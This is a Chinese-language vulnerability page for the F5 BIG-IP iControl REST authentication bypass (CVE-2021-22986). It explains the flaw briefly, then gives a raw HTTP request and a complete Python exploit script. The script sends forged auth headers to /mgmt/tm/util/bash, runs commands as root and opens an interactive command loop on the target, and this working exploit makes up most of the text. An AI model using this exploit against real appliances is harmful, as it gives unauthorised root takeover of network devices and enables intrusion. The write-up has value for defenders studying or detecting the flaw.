原理
当请求同时携带 HTTP Basic 认证头和值为空的 X-F5-Auth-Token 头时,iControl REST 会跳过对该请求身份的校验(Basic 认证中的密码可以是任意值,PoC 中分别使用了空密码和随意密码),攻击者无需有效凭证即可调用 /mgmt/tm/util/bash 等接口,实现未授权远程命令执行。
影响范围
危害
/mgmt/tm/util/bash 接口以 root 身份执行传入的命令,因此攻击者可直接获得 root 权限并以 root 身份执行任意命令,等同于设备被完全接管。
POC & EXP
手工
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.59.7
Content-Type: application/json
X-F5-Auth-Token:
Authorization: Basic YWRtaW46
Content-Length: 52

{
"command": "run",
"utilCmdArgs": "-c id"
}
脚本
import json
import os
import sys

import requests
requests.packages.urllib3.disable_warnings()
proxies = {'http': 'http://localhost:7890', 'https': 'http://localhost:7890'}
# F5 BIG-IP iControl REST authentication bypass -> RCE as root (CVE-2021-22986)
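def POC(ip, cmd):
    """Run one shell command on a BIG-IP via the CVE-2021-22986 auth bypass.

    Args:
        ip:  host (or host:port) of the BIG-IP management interface.
        cmd: shell command string handed to ``bash -c`` on the target.

    Returns:
        True if the response was HTTP 200 and carried a ``commandResult``
        field (its value is printed); False on any other status, a missing
        or unparsable result, or a transport error (the reason is printed).
    """
    url = "https://" + ip + "/mgmt/tm/util/bash"
    headers = {
        # Basic credentials are "admin:ASasS" — the password is irrelevant,
        # the empty X-F5-Auth-Token header is what makes the server skip the
        # credential check.
        "Authorization": "Basic YWRtaW46QVNhc1M=",
        "X-F5-Auth-Token": "",
        "Content-Type": "application/json",
    }
    # NOTE: cmd is wrapped in single quotes verbatim; a command containing a
    # literal ' will break the quoting on the target side.
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}

    try:
        resp = requests.post(url=url, json=data, headers=headers,
                             verify=False, timeout=20, proxies=proxies)
    except requests.RequestException as e:
        # Print the cause instead of a bare "Error": a proxy, TLS or timeout
        # failure must be distinguishable from a patched/non-vulnerable target.
        print("Error: " + str(e))
        return False

    if resp.status_code == 200 and 'commandResult' in resp.text:
        try:
            print(resp.json()['commandResult'])
        except (ValueError, KeyError) as e:
            # 200 with the substring present but not a usable JSON field.
            print("Error: unexpected response body: " + str(e))
            return False
        return True

    print("Code: " + str(resp.status_code))
    return False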
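if __name__ == "__main__":
    # Usage: python poc.py <host[:port]>  — target BIG-IP management interface.
    if len(sys.argv) < 2:
        print("Usage: {0} <ip[:port]>".format(sys.argv[0]))
        sys.exit(1)
    ip = sys.argv[1]

    # Probe with a harmless command first; only open the interactive loop if
    # the target actually returned a commandResult.
    if POC(ip, "whoami"):
        try:
            while True:
                POC(ip, input("Command: "))
        except (EOFError, KeyboardInterrupt):
            # Ctrl-D / Ctrl-C ends the shell loop without a traceback.
            print()
    else:
        print("commandResult not Found.")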